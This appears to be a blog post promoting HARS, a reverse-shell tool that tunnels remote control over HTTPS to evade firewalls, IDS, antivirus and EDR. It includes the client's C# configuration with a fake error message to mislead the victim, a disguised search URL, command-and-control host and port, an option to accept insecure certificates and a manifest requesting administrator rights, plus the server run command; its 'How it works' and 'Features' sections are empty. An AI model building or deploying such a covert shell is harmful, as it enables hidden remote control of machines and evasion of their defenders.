Http asynchronous reverse shell is a tool used for asynchronous reverse shell using the HTTP protocol.
Why ?
Today there are many ways to create a reverse shell in order to be able to remotely control a machine through a firewall. Indeed, outgoing connections are not always filtered.
However security software and hardware (IPS, IDS, Proxy, AV, EDR…) are more and more powerful and can detect these attacks. Most of the time the connection to a reverse shell is established through a TCP or UDP tunnel.
I figured that the best way to stay undetected would be to make it look like legitimate traffic. The HTTP protocol is the most used by a standard user. Moreover it is almost never filtered so as not to block access to websites.
How it works ?
And so on, until the attacker decides to end the session.
Also Read – Raspberry Pi Imager Utility 2020
Features
Today, as a poc, the following functionalities are implemented:
Only 3 out of 69 products were able to detect the client as malicious, without applying any evasive or obfuscation techniques.
Demonstration
Server side
Configuration
Client : C Sharp
Config.cs
This file contains parameters ; Assign the values you want :
class Config
{
/* Behavior */ // Display a fake error msg at startup
public static bool DisplayErrorMsg = true;
// Title of fake error msg
public static string ErrorMsgTitle = "This application could not be started.";
// Description of fake error msg
public static string ErrorMsgDesc = "Unhandled exception has occured in your application. \r\r Object {0} is not valid.";
// Min delay between the client calls
public static int MinDelay = 2;
// Max delay between the client calls
public static int MaxDelay = 5;
// Fake uri requested - Warning : it must begin with "search" (or need a change on server side)
public static string Url = "search?q=search+something&qs=n&form=QBRE&cvid=";
/* Listener */ // Hostname/IP of C&C server
public static string Server = "https://127.0.0.1";
// Listening port of C&C server
public static string Port = "443";
// Allow self-signed or "unsecure" certificates - Warning : often needed in corporate environment using proxy
public static bool AllowInsecureCertificate = true;
}
HARS.manifest
Change this line to run by default the client with certain privileges :
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
With<requestedExecutionLevel level="asInvoker" uiAccess="false" />
or<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
or<requestedExecutionLevel level="highestAvailable" uiAccess="false" />
Project properties
Here you can customize the assembly information and an icon for the file.
Note : Target .NET framework version is set to 4.6 which is available by default in Windows 10.
For Windows 7, choose .NET 3.5 if you don’t want to have to install missing features.
Build
Build the project from Visual Studio. The client should be generated in Http Asynchronous Reverse Shell\HARS_Client\HARS\bin\Release
folder.
Done!
Server : Python
HARS_Server.py Location : Http Asynchronous Reverse Shell\HARS_Server\www
Simply change the port or location on the certificate if needed in the config section.
# Config
PORT = 443
CERT_FILE = ‘../server.pem’
Run
python HARS_Server.py
Notes
Http Asynchronous Reverse Shell\HARS_Server\logs
\Http Asynchronous Reverse Shell\HARS_Server\templates
Disclaimer
This tool is only intended to be a proof of concept demonstration tool for authorized security testing. Make sure you check with your local laws before running this tool.
Kali Linux 2024.4, the final release of 2024, brings a wide range of updates and…
This Go program applies a lifetime patch to PowerShell to disable ETW (Event Tracing for…
GPOHunter is a comprehensive tool designed to analyze and identify security misconfigurations in Active Directory…
Across small-to-medium enterprises (SMEs) and managed service providers (MSPs), the top priority for cybersecurity leaders…
The free and open-source security platform SecHub, provides a central API to test software with…
Don't worry if there are any bugs in the tool, we will try to fix…